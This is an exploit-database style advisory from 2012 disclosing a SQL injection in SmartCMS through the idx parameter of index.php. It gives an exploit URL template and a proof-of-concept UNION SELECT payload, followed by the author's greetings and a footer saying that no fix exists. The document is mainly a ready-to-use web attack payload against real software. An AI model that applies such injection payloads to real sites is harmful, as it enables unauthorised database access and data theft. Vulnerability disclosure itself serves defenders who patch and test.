SmartCMS (index.php, idx parameter) SQL Injection Vulnerability

2012-11-26 17:05:24

=============================================================================================================

[o] SmartCMS <= SQL Injection Vulnerability

Software : SmartMS
Vendor : http://smartcms.nl/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

=============================================================================================================

[o] Exploit

http://localhost/[path]/index.php?idx=[SQLi]


[o] PoC

http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--

=============================================================================================================

[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

[o] November 26 2012 - Papua, Indonesia

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.